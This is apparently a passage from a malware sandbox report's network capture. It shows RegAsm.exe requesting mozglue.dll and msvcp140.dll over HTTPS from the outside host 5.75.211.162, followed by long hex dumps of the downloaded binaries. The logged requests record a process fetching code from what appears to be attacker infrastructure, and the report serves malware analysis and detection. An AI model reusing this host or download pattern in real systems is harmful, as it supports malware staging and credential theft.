a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:45 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:46 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:46 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:46 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:46 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 22:14:46 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:47 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:47 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:47 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:47 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 22:14:47 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
